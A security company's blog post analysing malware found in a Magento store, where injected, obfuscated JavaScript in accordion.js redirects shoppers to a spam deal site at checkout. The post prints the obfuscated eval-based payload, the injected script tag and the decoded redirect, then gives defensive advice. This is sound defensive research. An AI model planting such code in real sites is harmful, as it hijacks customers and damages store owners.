• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Malicious Redirect Injected in Magento One Page Checkout

November 23, 2016Bruno ZanelatoEspanolPortugues

431
SHARES
FacebookTwitterSubscribe

With the holiday season around the corner, ecommerce sites are very valuable to website owners and equally attractive to attackers. Hackers have been targeting Magento installations in order to steal sensitive information like credit card data or PayPal logins, but in this case, promote websites for their monetary gain. Being PCI compliant is becoming increasingly critical as attacks on ecommerce sites continue to evolve.

After the consumer has made the decision to purchase, the checkout process becomes one of the most important steps for any business. The user experience during this process sets the tone for the entire interaction and usually leads to a successful sale. When the visitor’s experience is disrupted, both the sale and their trust is often lost.

Checkout Page Redirect

During our malware investigation process, we found an interesting piece of code that redirected users to an external page not intended by the website owner during the checkout process.

The browsing and shopping experience remained unmodified until the consumer began to check out. After selecting the products and clicking “Proceed to checkout” the user was redirected to hxxp://bestdealsweek[.]com – instead of the payment page.

We took a look at the code to understand what was responsible for this redirect. Inside /js/varien/accordion.js we located the malicious code.

Here is the content (obfuscated):

var x="\'%kVg\'%YZaVn\'%(9\'%&%%(7%6\'%\'%hZiI^bZdji\'-\'\'YdXjbZci#adXVi^dc#]gZ[(9\',]
iie(6$$WZhiYZVahlZZ`#Xdb\',\'\'\'8\'%YZaVn\'.(7",y="",w="",z;z=x['length'];
for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)+11) }w=this['unescape'](y);this['eval'](w);

JavaScript Layer Creation

This particular file, coupled with /skin/frontend/base/default/js/opcheckout.js, creates a JavaScript Layer responsible for:

  1. Submitting step data to the checkout controller
  2. Interpreting controller responses to update the content of the checkout steps.

This layer allows the checkout process to be completed without the browser needing to load every request in a new page.

Here’s how the accordion.js was injected into the One Page checkout:

<script type="text/javascript"src="hxxps://domain/js/varien/accordion.js"></script>

After decoding it, we can see the redirect that happens within the user’s open tab:

var delay = 100;
setTimeout("document.location.href='hxxp://bestdealsweek.com'",delay);

This is one of the many injection techniques attackers have been using against Magento ecommerce sites to make a profit off of vulnerable sites. To reduce the risks of such injections, we recommend keeping all software updated (themes, plugins, core files) and using a Website Application Firewall.

Employing an Integrity Monitoring system to detect file modifications and creating a regular backup strategy will also benefit you in the case of a compromise.

Update: We have just released a Magento security guide. Check it out!

431
SHARES
FacebookTwitterSubscribe

Categories: Ecommerce Security, Magento SecurityTags: Hacked Websites, Redirects

About Bruno Zanelato

Bruno Zanelato is Sucuri's Copywriter who joined the company in 2014. As Eng - System III and working for the SOC team since 2019, his main responsibilities are (firewalls, IDS, IPS, HIDS, WAF, log management, hardening systems, PCI Compliant, IDS/IPS Signatures, Linux/BSD hardening, including developing content to highlight Sucuri's products and services and to educate the public about website security. Bruno's professional experience covers more than 15 years of deploying/managing Web Application Firewall as well as open-source security software. When Bruno isn't drafting blog posts or writing web pages, you might find him online playing MMO RPG games, watching MMA, and having fun with his kids and family during his free time. Connect with him on Linkedin

Reader Interactions

Comments

  1. Sean Owens

    November 24, 2016

    That’s why as a site owner you need to make sure where your “addons” are coming from, as a site developer you must examine the code of every addon you install carefully. Free addons should be avoided, and even paid ones should be checked rigorously.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Magento Webinar

PCI Compliance Guide

Magento Security Guide

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.